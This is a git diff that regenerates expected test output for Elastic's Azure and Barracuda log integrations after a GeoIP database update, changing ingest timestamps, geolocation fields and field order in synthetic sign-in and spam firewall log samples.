"{\"Cloud\":\"AzureCloud\",\"Environment\":\"prod\",\"category\":\"kube-audit\",\"ccpNamespace\":\"5e4bf4baee195b00017cdbfa\",\"operationName\":\"Microsoft.ContainerService/managedClusters/diagnosticLogs/Read\",\"properties\":{\"log\":\"{\\\"kind\\\":\\\"Event\\\",\\\"apiVersion\\\":\\\"audit.k8s.io/v1\\\",\\\"level\\\":\\\"Metadata\\\",\\\"auditID\\\":\\\"22af12c3-a1fe-4f2c-99a9-3cdde671dbfe\\\"}\",\"pod\":\"kube-apiserver-666bd4b459-hjgdc\",\"stream\":\"stdout\"},\"resourceId\":\"/SUBSCRIPTIONS/70BD6E77-4B1E-4835-8896-DB77B8EEF364/RESOURCEGROUPS/OBS-INFRASTRUCTURE/PROVIDERS/MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/OBSKUBE\",\"time\":\"2020-11-09T10:57:31.0000000Z\"}", "kind": "event" }, diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json index e65b5cdaed5..d7d72f3f589 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json @@ -21,7 +21,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:30:58.981445700Z", + "ingested": "2021-12-14T14:35:44.888547736Z", "original": "{\"Level\":4,\"category\":\"ManagedIdentitySignInLogs\",\"correlationId\":\"22222222-92d0-4887-9ead-46258539a699\",\"durationMs\":0,\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-b540-4792-a2a2-81818990a95b\",\"correlationId\":\"22222222-92d0-4887-9ead-46258539a699\",\"createdDateTime\":\"2021-01-23T20:44:29.7688982+00:00\",\"flaggedForReview\":false,\"id\":\"22222222-0b57-4b77-bf1a-317a88591a00\",\"ipAddress\":\"\",\"isInteractive\":false,\"location\":{\"city\":\"\",\"countryOrRegion\":\"\",\"geoCoordinates\":{\"latitude\":0,\"longitude\":0},\"state\":\"\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Windows Azure Service Management API\",\"resourceId\":\"22222222-ba00-4fd7-ba43-dac1f8f63013\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-864d-4e00-9882-ff649530f186\",\"servicePrincipalName\":\"ASC provisioning Dependency agent for Linux\",\"status\":{\"errorCode\":0},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/tenantId/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"tenantId\",\"time\":\"2021-01-23T20:44:29.7688982Z\"}", "kind": "event", "action": "Sign-in activity", diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json index a699faee34e..162fe091f2f 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json @@ -7,20 +7,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -55,7 +49,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:30:59.123869500Z", + "ingested": "2021-12-14T14:35:45.011793501Z", "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.144\",\"category\":\"NonInteractiveUserSignInLogs\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"durationMs\":0,\"identity\":\"Hello World\",\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Microsoft Teams\",\"appId\":\"22222222-bce4-4aaf-ab1b-5451cc387264\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":7,\"displayName\":\"01 - Require Windows Hybrid AD Joined Device\",\"enforcedGrantControls\":[\"RequireDomainJoinedDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-b7da-4d9e-ae41-779c5c256ac8\",\"result\":\"success\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"05 - MFA für Gäste\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-e960-42e6-ae3a-355df7e475d5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":12,\"conditionsSatisfied\":19,\"displayName\":\"02 - Mobile Device Policy\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-877a-4100-a0cf-5a589f2da3ad\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":16,\"conditionsSatisfied\":3,\"displayName\":\"04 - Block Legacy Authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8e59-4055-87b1-b54a055a7ca5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"06 - Enterprise Apps\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-39cb-4ec4-8ed2-ac1352d260ba\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"03 - Require MFA for Admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ea2f-4502-abb7-3689a1b0da41\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"07 - PowerAutomate Pilot\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8b95-43cb-8e7d-69e34704ab56\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02c - Mobile Device Policy Device Compliance\",\"enforcedGrantControls\":[\"RequireCompliantDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ff75-460a-800c-7fe88bd9c877\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02d - MacOS\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-9886-4897-b2e2-a096cd37bac3\",\"result\":\"notApplied\"}],\"authenticationDetails\":[],\"authenticationProcessingDetails\":[{\"key\":\"Is Client Capable\",\"value\":\"True\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"autonomousSystemNumber\":3320,\"clientAppUsed\":\"Mobile Apps and Desktop clients\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"createdDateTime\":\"2021-07-30T11:20:59.7789167+00:00\",\"crossTenantAccessType\":\"none\",\"deviceDetail\":{\"browser\":\"Edge 18.1836\",\"deviceId\":\"22222222-1e7a-44dc-8bc9-5736d8e2b063\",\"displayName\":\"ABCDEFG\",\"operatingSystem\":\"Windows 10\",\"trustType\":\"Hybrid Azure AD joined\"},\"flaggedForReview\":false,\"homeTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"id\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789123456},\"state\":\"Niedersachsen\"},\"networkLocationDetails\":[{\"networkNames\":[\"Hannover\"],\"networkType\":\"trustedNamedLocation\"}],\"originalRequestId\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"privateLinkDetails\":{},\"processingTimeInMilliseconds\":65,\"resourceDisplayName\":\"Office 365 Exchange Online\",\"resourceId\":\"22222222-0000-0ff1-ce00-000000000000\",\"resourceTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"ssoExtensionVersion\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363\",\"userDisplayName\":\"Hello World\",\"userId\":\"22222222-473d-4f4e-a526-ff54e71afe84\",\"userPrincipalName\":\"hello.world@company.de\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:20:59.7789167Z\"}", "kind": "event", "action": "Sign-in activity", diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json index 7bb15bff40d..eb72681e4b1 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json @@ -7,20 +7,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -55,7 +49,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:30:59.521517Z", + "ingested": "2021-12-14T14:35:45.381340001Z", "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.144\",\"category\":\"ServicePrincipalSignInLogs\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"durationMs\":0,\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-ddf2-4ab6-b25f-f23d5d614338\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"createdDateTime\":\"2021-07-30T11:29:26.6733668+00:00\",\"crossTenantAccessType\":\"none\",\"flaggedForReview\":false,\"id\":\"22222222-5ec0-4795-bf9f-9017bcc32f00\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789012345},\"state\":\"Niedersachsen\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Configuration Manager Microservice\",\"resourceId\":\"22222222-c916-4293-8373-d584996f60ae\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-4677-43b4-a1dc-ecb3230e9350\",\"servicePrincipalName\":\"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0\",\"status\":{\"errorCode\":7000222},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"7000222\",\"tenantId\":\"1111111111-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:29:26.6733668Z\"}", "kind": "event", "action": "Sign-in activity", diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json index 8dfb4154a46..0d29bb1969f 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json @@ -7,20 +7,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -56,7 +50,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:30:59.716497500Z", + "ingested": "2021-12-14T14:35:45.578585299Z", "original": "{\"Level\":\"4\",\"callerIpAddress\":\"81.2.69.144\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", "kind": "event", "action": "Sign-in activity", @@ -130,20 +124,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -179,7 +167,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:30:59.716506200Z", + "ingested": "2021-12-14T14:35:45.578587845Z", "original": "{\"Level\":\"4\",\"callerIpAddress\":\"81.2.69.144\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", "kind": "event", "action": "Sign-in activity", diff --git a/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json b/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json index a411804ae1a..60ce642c0c9 100644 --- a/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json +++ b/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json @@ -16,7 +16,7 @@ }, "event": { "action": "Microsoft.AppPlatform/Spring/logs", - "ingested": "2021-12-09T13:31:00.534484200Z", + "ingested": "2021-12-14T14:35:46.238519219Z", "original": "{ \"time\": \"2021-07-01T19:30:30.535404056Z\", \"LogFormat\": \"RAW\", \"resourceId\": \"/SUBSCRIPTIONS/EDD63B67-0BA2-4837-A4EB-CD484E9FF623/RESOURCEGROUPS/SA-HEMANT/PROVIDERS/MICROSOFT.APPPLATFORM/SPRING/HM-SC-PETCLINIC\", \"operationName\": \"Microsoft.AppPlatform/Spring/logs\", \"category\": \"ApplicationConsole\", \"level\": \"Informational\", \"location\": \"westus2\", \"properties\": {\"Log\":\"2021-07-01 19:30:30.535 INFO 1 --- [oundedElastic-9] c.c.c.ConfigServicePropertySourceLocator : Located environment: name=admin-server, profiles=[mysql], label=null, version=638a1af7fc8d331d7eb26a571275e954632717e8, state=null\\n\",\"Stream\":\"stdout\",\"AppName\":\"admin-server\",\"InstanceName\":\"admin-server-default-12-8459d44f68-g4b5f\",\"ServiceId\":\"c41fd000b1a5450eb234039376da26de\",\"ServiceName\":\"hm-sc-petclinic\"}}", "kind": "event" }, diff --git a/packages/azure/docs/README.md b/packages/azure/docs/README.md index 3b72a2bb244..46fd35439c0 100644 --- a/packages/azure/docs/README.md +++ b/packages/azure/docs/README.md @@ -234,6 +234,7 @@ An example event for `activitylogs` looks as following: | geo.country_iso_code | Country ISO code. | keyword | | geo.country_name | Country name. | keyword | | geo.location | Longitude and latitude. | geo_point | +| geo.name | User-defined description of a location, at the level of granularity they care about. Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. Not typically used in automated geolocation. | keyword | | geo.region_iso_code | Region ISO code. | keyword | | geo.region_name | Region name. | keyword | | host.architecture | Operating system architecture. | keyword | diff --git a/packages/azure/docs/activitylogs.md b/packages/azure/docs/activitylogs.md index 01e69aa8c0b..3ddaee5e69c 100644 --- a/packages/azure/docs/activitylogs.md +++ b/packages/azure/docs/activitylogs.md @@ -223,6 +223,7 @@ An example event for `activitylogs` looks as following: | geo.country_iso_code | Country ISO code. | keyword | | geo.country_name | Country name. | keyword | | geo.location | Longitude and latitude. | geo_point | +| geo.name | User-defined description of a location, at the level of granularity they care about. Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. Not typically used in automated geolocation. | keyword | | geo.region_iso_code | Region ISO code. | keyword | | geo.region_name | Region name. | keyword | | host.architecture | Operating system architecture. | keyword | diff --git a/packages/azure/manifest.yml b/packages/azure/manifest.yml index b94220976e6..6189eb89b74 100644 --- a/packages/azure/manifest.yml +++ b/packages/azure/manifest.yml @@ -1,6 +1,6 @@ name: azure title: Azure Logs -version: 0.12.1 +version: 0.12.2 release: beta description: This Elastic integration collects logs from Azure type: integration diff --git a/packages/barracuda/changelog.yml b/packages/barracuda/changelog.yml index 013f95d09ab..618844e86ed 100644 --- a/packages/barracuda/changelog.yml +++ b/packages/barracuda/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.7.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.7.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json b/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json index c29ba6d128a..fe0c1220405 100644 --- a/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[avolupt]: 10.224.15.48 nto sse accept tur 3 illumqui 1090 1.2364 ivelitse ritin", "event": { - "ingested": "2021-06-09T09:46:40.867376100Z" + "ingested": "2021-12-14T14:35:57.048680403Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: etdo[10.173.228.223] ntsunti 1455282753 1455282753 SCAN nseq itinvol psa umq 0 31 psaq SZ:cer SUBJ:reveri", "event": { - "ingested": "2021-06-09T09:46:40.867399100Z" + "ingested": "2021-12-14T14:35:57.048683221Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.104.162.169 eosquir orsi nulapari allow vol 4 uidolor nibus mipsumq \u003c\u003cgnaali\u003e: enatus", "event": { - "ingested": "2021-06-09T09:46:40.867407400Z" + "ingested": "2021-12-14T14:35:57.048683733Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[iatu]: 10.57.70.73 dolo meumfug deny roinBCS 2 com 1060 1.2548 byC tinculp", "event": { - "ingested": "2021-06-09T09:46:40.867413500Z" + "ingested": "2021-12-14T14:35:57.048684177Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.236.42.236 tconsec nsequat taev block untutl 1 llu uptassi tamremap tur", "event": { - "ingested": "2021-06-09T09:46:40.867464300Z" + "ingested": "2021-12-14T14:35:57.048684561Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (enatuse.exe) queued as magn", "event": { - "ingested": "2021-06-09T09:46:40.867471400Z" + "ingested": "2021-12-14T14:35:57.048684963Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[sit]: avol[10.162.151.94] laboreet 1461457525 1461457525 RECV aquaeabi giatq quid", "event": { - "ingested": "2021-06-09T09:46:40.867477400Z" + "ingested": "2021-12-14T14:35:57.048685364Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: tempor[10.138.137.28] eip 1462692479 1462692479 SCAN lupta iusmodt doloreeu pori 7 8 ect SZ:reetdolo SUBJ:nrepreh", "event": { - "ingested": "2021-06-09T09:46:40.867483100Z" + "ingested": "2021-12-14T14:35:57.048685755Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: ari[10.108.180.105] nsequat 1463927433 1463927433 block llam llamcorp ari eataevit 4 38 uovol dmi", "event": { - "ingested": "2021-06-09T09:46:40.867489300Z" + "ingested": "2021-12-14T14:35:57.048686151Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.206.159.177] ididu 1465162388 1465162388 RECV ciunt turQuisa 10 74 lit", "event": { - "ingested": "2021-06-09T09:46:40.867494900Z" + "ingested": "2021-12-14T14:35:57.048686547Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[umdo]: sed[10.206.224.241] reetdolo 1466397342 1466397342 RECV olupta turveli 4 40 tatno", "event": { - "ingested": "2021-06-09T09:46:40.867519600Z" + "ingested": "2021-12-14T14:35:57.048686956Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: aveniam[10.82.201.113] essequ 1467632296 1467632296 SCAN taevi ender snulapar aedic 5 13 iumto SZ:aboreetd SUBJ:sun", "event": { - "ingested": "2021-06-09T09:46:40.867528500Z" + "ingested": "2021-12-14T14:35:57.048687953Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (tem.exe) queued as ons", "event": { - "ingested": "2021-06-09T09:46:40.867534900Z" + "ingested": "2021-12-14T14:35:57.048688440Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.110.109.5 ittenbyC aperi lor accept ipi 4 paqu eseru remeum #to#10.18.165.35", "event": { - "ingested": "2021-06-09T09:46:40.867547500Z" + "ingested": "2021-12-14T14:35:57.048688826Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: dolore[10.195.109.134] eddoei 1471337159 1471337159 deny etM nimadmin ditautfu piscing 6 74 ostr rudexerc", "event": { - "ingested": "2021-06-09T09:46:40.867552800Z" + "ingested": "2021-12-14T14:35:57.048689219Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[colabor]: iusmodt[10.21.92.218] lorumw 1472572113 1472572113 accept llitani inima tlabo suntexp 4 45 stiae SZ:nofdeF SUBJ:sunt", "event": { - "ingested": "2021-06-09T09:46:40.867558100Z" + "ingested": "2021-12-14T14:35:57.048689630Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (tat.exe) queued as tion", "event": { - "ingested": "2021-06-09T09:46:40.867563300Z" + "ingested": "2021-12-14T14:35:57.048690163Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (emp.exe) queued as aperia", "event": { - "ingested": "2021-06-09T09:46:40.867568200Z" + "ingested": "2021-12-14T14:35:57.048690553Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: Ret Policy Summary (Del:eritquii Kept:dexeac)", "event": { - "ingested": "2021-06-09T09:46:40.867572700Z" + "ingested": "2021-12-14T14:35:57.048690961Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.45.25.68] LOGOUT (rehender)", "event": { - "ingested": "2021-06-09T09:46:40.867577Z" + "ingested": "2021-12-14T14:35:57.048691345Z" 